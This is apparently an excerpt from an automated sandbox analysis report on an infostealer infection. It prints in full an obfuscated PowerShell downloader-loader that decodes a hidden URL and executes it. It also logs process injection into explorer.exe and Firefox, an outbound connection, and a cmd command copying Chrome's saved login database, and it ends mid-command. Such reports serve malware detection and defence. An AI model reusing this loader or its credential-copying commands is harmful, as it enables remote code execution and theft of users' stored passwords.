        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A368C mov eax, dword ptr fs:[00000030h]20_2_224A368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A368C mov eax, dword ptr fs:[00000030h]20_2_224A368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A368C mov eax, dword ptr fs:[00000030h]20_2_224A368C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22424690 mov eax, dword ptr fs:[00000030h]20_2_22424690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22424690 mov eax, dword ptr fs:[00000030h]20_2_22424690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245C6A6 mov eax, dword ptr fs:[00000030h]20_2_2245C6A6
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241D6AA mov eax, dword ptr fs:[00000030h]20_2_2241D6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241D6AA mov eax, dword ptr fs:[00000030h]20_2_2241D6AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h]20_2_224176B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h]20_2_224176B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224176B2 mov eax, dword ptr fs:[00000030h]20_2_224176B2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224566B0 mov eax, dword ptr fs:[00000030h]20_2_224566B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22433740 mov eax, dword ptr fs:[00000030h]20_2_22433740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22433740 mov eax, dword ptr fs:[00000030h]20_2_22433740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22433740 mov eax, dword ptr fs:[00000030h]20_2_22433740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224F3749 mov eax, dword ptr fs:[00000030h]20_2_224F3749
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245674D mov esi, dword ptr fs:[00000030h]20_2_2245674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245674D mov eax, dword ptr fs:[00000030h]20_2_2245674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245674D mov eax, dword ptr fs:[00000030h]20_2_2245674D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22420750 mov eax, dword ptr fs:[00000030h]20_2_22420750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462750 mov eax, dword ptr fs:[00000030h]20_2_22462750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22462750 mov eax, dword ptr fs:[00000030h]20_2_22462750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224AE75D mov eax, dword ptr fs:[00000030h]20_2_224AE75D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A4755 mov eax, dword ptr fs:[00000030h]20_2_224A4755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h]20_2_2241B765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h]20_2_2241B765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h]20_2_2241B765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2241B765 mov eax, dword ptr fs:[00000030h]20_2_2241B765
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22428770 mov eax, dword ptr fs:[00000030h]20_2_22428770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22430770 mov eax, dword ptr fs:[00000030h]20_2_22430770
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22425702 mov eax, dword ptr fs:[00000030h]20_2_22425702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22425702 mov eax, dword ptr fs:[00000030h]20_2_22425702
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22427703 mov eax, dword ptr fs:[00000030h]20_2_22427703
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245C700 mov eax, dword ptr fs:[00000030h]20_2_2245C700
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22420710 mov eax, dword ptr fs:[00000030h]20_2_22420710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22450710 mov eax, dword ptr fs:[00000030h]20_2_22450710
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245F71F mov eax, dword ptr fs:[00000030h]20_2_2245F71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245F71F mov eax, dword ptr fs:[00000030h]20_2_2245F71F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22423720 mov eax, dword ptr fs:[00000030h]20_2_22423720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h]20_2_2243F720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h]20_2_2243F720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2243F720 mov eax, dword ptr fs:[00000030h]20_2_2243F720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224DF72E mov eax, dword ptr fs:[00000030h]20_2_224DF72E
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245C720 mov eax, dword ptr fs:[00000030h]20_2_2245C720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245C720 mov eax, dword ptr fs:[00000030h]20_2_2245C720
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224E972B mov eax, dword ptr fs:[00000030h]20_2_224E972B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419730 mov eax, dword ptr fs:[00000030h]20_2_22419730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22419730 mov eax, dword ptr fs:[00000030h]20_2_22419730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_22455734 mov eax, dword ptr fs:[00000030h]20_2_22455734
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h]20_2_224FB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h]20_2_224FB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h]20_2_224FB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224FB73C mov eax, dword ptr fs:[00000030h]20_2_224FB73C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242973A mov eax, dword ptr fs:[00000030h]20_2_2242973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242973A mov eax, dword ptr fs:[00000030h]20_2_2242973A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245273C mov eax, dword ptr fs:[00000030h]20_2_2245273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245273C mov ecx, dword ptr fs:[00000030h]20_2_2245273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2245273C mov eax, dword ptr fs:[00000030h]20_2_2245273C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2249C730 mov eax, dword ptr fs:[00000030h]20_2_2249C730
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242C7C0 mov eax, dword ptr fs:[00000030h]20_2_2242C7C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h]20_2_224257C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h]20_2_224257C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224257C0 mov eax, dword ptr fs:[00000030h]20_2_224257C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224A07C3 mov eax, dword ptr fs:[00000030h]20_2_224A07C3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_2242D7E0 mov ecx, dword ptr fs:[00000030h]20_2_2242D7E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224427ED mov eax, dword ptr fs:[00000030h]20_2_224427ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224427ED mov eax, dword ptr fs:[00000030h]20_2_224427ED
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 20_2_224427ED mov eax, dword ptr fs:[00000030h]20_2_224427ED
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C8949C GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,25_2_00C8949C
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C92000 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,25_2_00C92000
        Source: C:\Windows\SysWOW64\raserver.exeCode function: 25_2_00C926B0 SetUnhandledExceptionFilter,25_2_00C926B0

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\explorer.exeNetwork Connect: 46.23.69.44 80Jump to behavior
        Source: Yara matchFile source: amsi64_7428.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7428, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7748, type: MEMORYSTR
        Source: C:\Windows\SysWOW64\raserver.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000 value starts with: 4D5AJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread register set: target process: 4056Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread register set: target process: 4056Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 4056Jump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: C80000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3000000Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 70FFD8Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeMemory written: C:\Program Files\Mozilla Firefox\firefox.exe base: 7FF722870000Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /VJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' 